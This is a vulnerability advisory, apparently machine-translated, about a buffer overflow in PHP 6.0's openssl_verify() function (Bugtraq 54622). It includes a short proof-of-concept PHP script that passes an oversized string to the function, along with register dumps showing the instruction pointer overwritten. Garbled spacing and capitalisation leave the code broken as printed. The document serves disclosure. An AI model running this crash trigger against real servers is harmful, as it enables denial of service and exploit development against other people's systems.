PHP 'openssl _ verify () 'Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
PHP 6.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54622

PHP is an embedded HTML language. PHP is similar to Microsoft's ASP. It is a script language that is executed on the server side and embedded in HTML documents, the language style is similar to the C language and is widely used by many website programmers.

A buffer overflow vulnerability exists in PHP 6.0. Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected Web server.

<* Source: vendor
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Vendor () provides the following test methods:

<? Php
// ================================================ ========================================================== ====
//
// PHP 6.0 openssl_verify () Local Buffer Overflow PoC
//
// Tested on win xp, Apache, PHP 6.0dev. Local Buffer Overflow.
//
// Local Buffer Overflow
// Author: Pr0T3cT10n <pr0t3ct10n@gmail.com>
//
// ================================================ ========================================================== ====
//
// REGISTERS:
// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8
// EBX 00BBC940, ESP 0012FB5C UNICODE "AAA ...."
// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA ...."
// EIP 00410041
//
// ================================================ ========================================================== ====

$ Buffer = str_repeat ("A", 1000 );
Openssl_verify (1, 1, $ buffer );
?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PHP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.php.net